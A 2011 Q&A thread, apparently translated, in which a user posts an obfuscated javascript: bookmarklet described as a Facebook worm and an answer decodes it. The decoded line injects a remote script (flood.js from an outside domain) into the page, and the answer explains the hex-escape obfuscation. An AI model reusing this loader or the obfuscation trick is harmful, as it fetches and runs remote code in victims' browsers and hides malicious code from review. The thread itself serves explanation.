How to encode this script?

Question

How to encode this script?

I recently found this srcipt, which is basically a “worm” on facebook, so don't run it. All I want to know is how the creator began to code it. Any help?

javascript:var _0x8dd5=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0x8dd5[2]](_0x8dd5[1]))[_0x8dd5[0]]=_0x8dd5[3];b[_0x8dd5[5]][_0x8dd5[4]](a); void (0);

+4

javascript

Emily lawrence Aug 4 '11 at 13:12

source share

1 answer

Delan azabani · Answer 1 · 2011-08-04T13:17:57+0000

The author used various methods of "obfuscation", i.e. various methods to make the code visually confusing and difficult to understand.

_0x8dd5 is an array of strings:

 ['src', 'script', 'createElement', 'http://ug-radio.co.cc/flood.js', 'appendChild', 'body']

The rest of the code uses the property names from the lines above, so the non-obfuscated code is actually

 a = document.createElement('script'); a.src = 'http://ug-radio.co.cc/flood.js'; document.body.appendChild(a);

Therefore, all that the author did to obfuscate the code was links to all property names as strings from an array. An array containing strings simply uses the hexadecimal identification of the escape code \xNN , which makes it less obvious as to what strings are.

The author does this by finding the hexadecimal values of the bytes that form the strings in the current encoding. Then for each byte in the lines it adds \xNN , where NN is the value of the hexadecimal byte. When the JavaScript interpreter runs the script, the parser automatically replaces these screens with the appropriate characters.

How to encode this script?

More articles: